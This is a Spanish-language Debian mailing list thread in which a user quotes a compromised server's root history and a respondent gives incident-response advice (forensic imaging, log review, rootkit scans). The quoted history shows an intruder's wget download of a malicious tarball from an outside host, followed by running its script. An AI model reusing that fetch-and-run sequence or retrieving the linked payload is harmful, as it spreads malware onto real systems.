Re: Posible intrusión un server
El día 13 de mayo de 2011 08:39, ciracusa <ciracusa@gmail.com> escribió:
> Lista, buenas tardes.
>
> Perdón si este tema no esta directamente relacionado con Debian, pero como
> el server en cuestión tiene Squeeze y es un tema de seguridad creo que puede
> interesarles a mas de uno.
>
> Ayer viendo el history de root de un servidor veo lo siguiente:
>
> 314 ./go.sh 189
> 315 w
> 316 cd
> 317 cd /var/tmp/
> 318 rm -rf gosh
> 319 ls -a
> 320 exit
> 321 cat /proc/cpuinfo
> 322 passwd
> 323 cd /var/tmp/
> 324 cd gosh
> 325 touch bios.txt
> 326 chmod +x *
> 327 screen
> 328 exit
> 329 cat /proc/cpuinfo
> 330 cd /var/tmp/
> 331 ls -a
> 332 wget http://gblteam.webs.com/gosh.tgz.tar
> 333 tar zxvf gosh.tgz.tar
> 334 rm -rf gosh.tgz.tar
> 335 cd gosh
> 336 touch bios.txt
> 337 chmod +x *
> 338 ./go.sh 200
> 339 cd
> 340 cd /var/tmp/
> 341 ls -a
> 342 rm -rf gosh
> 343 ls -a
> 344 exit
> 345 cd /var/tmp/
> 346 perl x.pl
>
>
> Que opinan?
Yo, haria una imagen para analisis forense!
Luego, que servicios tenes?
Si es apache y tenes php; busca en el log de apache y alli encontraras
la respuesta de como entraron.
Luego, # last y veras si llego a root.
Si usas ssh con contrasena, podrias probar a loguearte en terminal
remota y sin meter la contrasena; trata de entrar por sftp; la
posibilidad es de aprox. 1/25.
Chequea las ultimas vulnerabilidades en http://www.exploit-db.com
Si usas tripwire y tenes la base en remoto; comparala con la del
servidor, para descubrir el culpable.
Pasale chkrootkit y chkhunterdesde una live, para saber que bichos tenes.
Y por ultimo, nada de lo que tengas alli, es confiable; asi como los
backups, hasta que descubras el momento exacto de la intrusion.
hasta pronto.
PD:
El uso de paquetes de terceros, es uno de los mayores riesgos; asi
como a mas capas de software, mayor riesgo.
.
>
> Entiendo -lamentablemente- que el server fue comprometido, pero lo que no
> llego a comprender es el alcance de esto.
>
> Notar que puse el link para que puedan descargarlo uds. también y analizarlo
> (tomando las precauciones del caso).
>
> Bueno, si alguien tiene algo de info muy agradecido.
>
> Y si pueden recomendarme algunos pasos para analizar la seguridad del server
> desde ya muchas gracias.
>
> Salu2.
>
>
> --
> To UNSUBSCRIBE, email to debian-user-spanish-REQUEST@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact
> listmaster@lists.debian.org
> Archive: [🔎] 4DCD50CC.3030902@gmail.com">http://lists.debian.org/[🔎] 4DCD50CC.3030902@gmail.com
>
>
Reply to: